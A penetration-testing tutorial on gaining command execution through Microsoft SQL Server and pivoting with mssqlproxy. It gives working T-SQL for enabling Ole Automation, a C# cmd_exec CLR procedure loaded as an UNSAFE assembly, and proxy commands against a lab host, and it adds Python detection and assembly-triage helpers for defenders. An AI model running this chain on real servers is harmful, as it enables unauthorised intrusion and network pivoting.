
0x00 Background

In penetration tests, database connections are frequently used to break through the DMZ. A couple of days ago I saw a write-up on using MSSQL to build a proxy that crosses the DMZ and reaches application assets that have no outbound network access. Microsoft SQL Server can now integrate with the Common Language Runtime (CLR) component of the Microsoft Windows .NET Framework. The CLR provides services to managed code such as cross-language integration, code access security, object lifetime management, and debugging and profiling support. With the CLR, stored procedures, triggers, user-defined types, user-defined functions (scalar and table-valued) and user-defined aggregate functions can be written in .NET Framework languages.

0x01 Environment Setup

Database service:

Demo environment: Windows Server 2008 R2 Standard

Test host address: 192.168.3.174

MSSQL version: Microsoft SQL Server 2012 - 11.0.2100.60 (X64)

The scenario the original researchers describe: after gaining control of an internet-facing server, they took over the MSSQL database through information gathering or ordinary penetration steps. The firewall rules allowed only port 1433 through, so the core servers could not be reached directly; the MSSQL database was therefore used to build a proxy and reach internal resources and services.

0x02 File Operations

Enable sp_OACreate (Ole Automation Procedures)

EXEC master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;
EXEC master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;


Disable sp_OACreate

EXEC sp_configure 'show advanced options',1;reconfigure;
EXEC sp_configure 'ole automation procedures',0;reconfigure;
EXEC sp_configure 'show advanced options',0;reconfigure;

Write a test file through the scripting.filesystemobject COM object (requires Ole Automation Procedures to be enabled)

DECLARE @o int, @f int, @t int, @ret int
DECLARE @line varchar(8000)
-- create a FileSystemObject, create a text file, then write one line into it
EXEC sp_OACreate 'scripting.filesystemobject',@o out
EXEC sp_OAMethod @o, 'createtextfile', @f out, 'C:\windows\temp\c4.txt', 1
EXEC @ret = sp_OAMethod @f, 'writeline', NULL ,'C4'
 

0x03 Command Execution

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;

public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void cmd_exec (SqlString execCommand)
    {
        // Run the supplied command through cmd.exe /C and capture its stdout.
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
        proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();
        // Create the record and specify the metadata for the columns.
        SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
        // Mark the beginning of the result set.
        SqlContext.Pipe.SendResultsStart(record);
        // Set values for each column in the row
        record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());
        // Send the row back to the client.
        SqlContext.Pipe.SendResultsRow(record);
        // Mark the end of the result set.
        SqlContext.Pipe.SendResultsEnd();
        proc.WaitForExit();
        proc.Close();
    }
}
 

Compile the DLL with csc.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library d:\mssqlproxy\cmdexce.cs


Write the compiled DLL to disk

DECLARE @ob INT;
EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;
EXEC sp_OASetProperty @ob, 'Type', 1;
EXEC sp_OAMethod @ob, 'Open';
EXEC sp_OAMethod @ob, 'Write', NULL, <hex-encoded DLL bytes, omitted here>;
EXEC sp_OAMethod @ob, 'SaveToFile', NULL, 'c:\windows\temp\cmd_exec.dll', 2;
EXEC sp_OAMethod @ob, 'Close';
EXEC sp_OADestroy @ob;


Execute system commands

CREATE ASSEMBLY my_assembly
FROM 'C:\windows\temp\cmd_exec.dll'
WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
cmd_exec 'ver'
DROP PROCEDURE cmd_exec
DROP ASSEMBLY my_assembly
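Every step in sections 0x02 and 0x03 leaves a trace in T-SQL batch text: enabling Ole Automation Procedures or clr enabled, sp_OACreate with a COM ProgID, CREATE ASSEMBLY with an UNSAFE permission set, and CREATE PROCEDURE ... EXTERNAL NAME. The following detection helper is an added example, not code from the original post or from the mssqlproxy project. It classifies captured batch text against those patterns and groups hits per session, so the whole chain in one session stands out. The `session_id` / `statement` event fields are an assumed shape for audit or Extended Events records, and the sample events are constructed from the statements shown in this post.

```python
# Added example (not from the original post or from mssqlproxy): classify
# captured T-SQL batch text for the configuration changes and statements used
# in this write-up. Event field names ("session_id", "statement") are assumed.
import re
from typing import Dict, List

# Optional schema prefixes (master.dbo.) and bracket quoting before sp_configure.
_SP_CONFIGURE = r"(?:\[?master\]?\s*\.\s*)?(?:\[?dbo\]?\s*\.\s*)?\[?sp_configure\]?"

# (finding name, compiled pattern). Configuration rules fire only on the
# enabling value 1, so the disable statements from the post do not alert.
RULES = [
    ("ole_automation_enabled",
     re.compile(_SP_CONFIGURE + r"\s+'ole automation procedures'\s*,\s*1\b", re.I)),
    ("clr_enabled",
     re.compile(_SP_CONFIGURE + r"\s+'clr enabled'\s*,\s*1\b", re.I)),
    ("xp_cmdshell_enabled",
     re.compile(_SP_CONFIGURE + r"\s+'xp_cmdshell'\s*,\s*1\b", re.I)),
    # Captures the COM ProgID so the finding names the object that was created.
    ("ole_object_created",
     re.compile(r"\bsp_OACreate\s+'(?P<progid>[^']+)'", re.I)),
    ("unsafe_assembly_created",
     re.compile(r"\bCREATE\s+ASSEMBLY\b.*?\bPERMISSION_SET\s*=\s*(?:UNSAFE|EXTERNAL_ACCESS)\b",
                re.I | re.S)),
    ("clr_procedure_bound",
     re.compile(r"\bCREATE\s+(?:PROCEDURE|PROC|FUNCTION)\b.*?\bEXTERNAL\s+NAME\b",
                re.I | re.S)),
]


def classify_batch(sql: str) -> List[str]:
    """Return finding names for one T-SQL batch, in rule order (empty if clean)."""
    findings = []
    for name, pattern in RULES:
        match = pattern.search(sql)
        if not match:
            continue
        if name == "ole_object_created":
            findings.append(f"{name}:{match.group('progid').lower()}")
        else:
            findings.append(name)
    return findings


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group findings by session so the chain enable -> create COM object ->
    load assembly -> bind procedure in one session stands out from isolated hits."""
    per_session: Dict[str, List[str]] = {}
    for event in events:
        hits = classify_batch(event["statement"])
        if hits:
            per_session.setdefault(event["session_id"], []).extend(hits)
    return per_session


# Constructed sample events: session 53 replays the statements from this post,
# session 60 is ordinary activity (including the disable step) that must not alert.
SAMPLE_EVENTS = [
    {"session_id": "53", "statement":
        "EXEC master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;\n"
        "EXEC master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;"},
    {"session_id": "60", "statement": "SELECT name, permission_set_desc FROM sys.assemblies;"},
    {"session_id": "53", "statement":
        "DECLARE @ob INT; EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;"
        "EXEC sp_OAMethod @ob, 'SaveToFile', NULL, 'c:\\windows\\temp\\cmd_exec.dll', 2;"},
    {"session_id": "53", "statement": "EXEC sp_configure 'clr enabled', 1; RECONFIGURE;"},
    {"session_id": "53", "statement":
        "CREATE ASSEMBLY my_assembly FROM 'C:\\windows\\temp\\cmd_exec.dll'\n"
        "WITH PERMISSION_SET = UNSAFE;\n"
        "CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) "
        "AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];"},
    {"session_id": "60", "statement": "EXEC sp_configure 'ole automation procedures',0;reconfigure;"},
]

if __name__ == "__main__":
    for session, hits in triage(SAMPLE_EVENTS).items():
        print(session, hits)
```

The rules only look at the enabling value, so a routine hardening script that sets these options to 0 does not generate noise; what matters for triage is the sequence of findings inside a single session rather than any one statement.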
 

0x04 Environment Test

python mssqlclient.py administrator@192.168.3.174 -windows-auth
 
upload reciclador.dll C:\windows\temp\reciclador.dll
 
python mssqlclient.py administrator@192.168.3.174 -windows-auth -install -clr assembly.dll
 
USE msdb;
SELECT      SCHEMA_NAME(so.[schema_id]) AS [schema_name],
            af.file_id,
            af.name + '.dll' AS [file_name],
            asmbly.clr_name,
            asmbly.assembly_id,
            asmbly.name AS [assembly_name],
            am.assembly_class,
            am.assembly_method,
            so.object_id AS [sp_object_id],
            so.name AS [sp_name],
            so.[type] AS [sp_type],
            asmbly.permission_set_desc,
            asmbly.create_date,
            asmbly.modify_date,
            af.content
FROM        sys.assembly_modules am
INNER JOIN  sys.assemblies asmbly
        ON  asmbly.assembly_id = am.assembly_id
INNER JOIN  sys.assembly_files af
        ON  asmbly.assembly_id = af.assembly_id
INNER JOIN  sys.objects so
        ON  so.[object_id] = am.[object_id]
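The inventory query above returns every CLR assembly together with its permission set, its entry points and the raw assembly bytes (af.content). The following triage routine is an added example, not code from the original post or from mssqlproxy: it takes rows shaped like that query's column aliases and flags assemblies that run above SAFE, whose bytes do not hash to a baselined value, or that are unsigned. The rows and the known-good bytes are constructed sample data; the allowlist of SHA-256 hashes is assumed to be maintained by the DBA from a known-good baseline, and the unsigned check relies on the `publickeytoken=null` text that sys.assemblies.clr_name carries for assemblies without a strong name.

```python
# Added example (not from the original post or from mssqlproxy): triage rows
# returned by the CLR assembly inventory query. Column names follow the query's
# aliases; sample rows, bytes and the allowlist are constructed.
import hashlib
from typing import Dict, List, Set


def content_sha256(content: bytes) -> str:
    """Hash of af.content, the assembly bytes stored in sys.assembly_files."""
    return hashlib.sha256(content).hexdigest()


def review_assemblies(rows: List[Dict], allowlist: Set[str]) -> List[Dict]:
    """Return one review record per row listing the reasons it needs attention.

    Checks: permission set above SAFE, assembly bytes not in the allowlist, and
    an unsigned assembly (clr_name contains 'publickeytoken=null')."""
    reviews = []
    for row in rows:
        reasons = []
        perm = row["permission_set_desc"]
        if perm != "SAFE_ACCESS":
            reasons.append(f"permission_set:{perm}")
        digest = content_sha256(row["content"])
        if digest not in allowlist:
            reasons.append("hash_not_allowlisted")
        if "publickeytoken=null" in row["clr_name"].lower():
            reasons.append("unsigned")
        reviews.append({
            "assembly_name": row["assembly_name"],
            "entry_point": f"{row['assembly_class']}.{row['assembly_method']}",
            "sp_name": row["sp_name"],
            "sha256": digest,
            "reasons": reasons,
        })
    return reviews


def needs_attention(reviews: List[Dict]) -> List[str]:
    """Names of assemblies with at least one reason, for a quick ticket summary."""
    return [r["assembly_name"] for r in reviews if r["reasons"]]


# Constructed sample: one SAFE, signed, baselined helper and one UNSAFE, unsigned
# assembly whose procedure matches the one created earlier in this post.
KNOWN_GOOD_BYTES = b"MZ\x90\x00 constructed stand-in for a baselined assembly"
ALLOWLIST = {content_sha256(KNOWN_GOOD_BYTES)}

SAMPLE_ROWS = [
    {"schema_name": "dbo", "file_name": "GeoHelpers.dll",
     "clr_name": "geohelpers, version=1.0.0.0, culture=neutral, "
                 "publickeytoken=0123456789abcdef, processorarchitecture=msil",
     "assembly_name": "GeoHelpers", "assembly_class": "Geo", "assembly_method": "Distance",
     "sp_name": "fn_distance", "permission_set_desc": "SAFE_ACCESS",
     "create_date": "2019-03-01 10:00:00", "content": KNOWN_GOOD_BYTES},
    {"schema_name": "dbo", "file_name": "my_assembly.dll",
     "clr_name": "my_assembly, version=0.0.0.0, culture=neutral, "
                 "publickeytoken=null, processorarchitecture=msil",
     "assembly_name": "my_assembly", "assembly_class": "StoredProcedures",
     "assembly_method": "cmd_exec", "sp_name": "cmd_exec",
     "permission_set_desc": "UNSAFE_ACCESS",
     "create_date": "2020-05-14 02:13:41",
     "content": b"MZ\x90\x00 constructed stand-in for a freshly loaded assembly"},
]

if __name__ == "__main__":
    for review in review_assemblies(SAMPLE_ROWS, ALLOWLIST):
        print(review["assembly_name"], review["entry_point"], review["reasons"])
```

Hashing af.content rather than the DLL on disk matters because the assembly bytes live inside the database: the file under C:\windows\temp can be deleted after CREATE ASSEMBLY, while the catalog copy is what actually executes.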
 
python mssqlclient.py administrator@192.168.3.174 -windows-auth -check -reciclador "C:\windows\temp\reciclador.dll"
 
python mssqlclient.py administrator@192.168.3.174 -windows-auth -start -reciclador "C:\windows\temp\reciclador.dll"
 

https://github.com/blackarrowsec/mssqlproxy

https://www.blackarrow.net/mssqlproxy-pivoting-clr/

https://blog.netspi.com/attacking-sql-server-clr-assemblies/
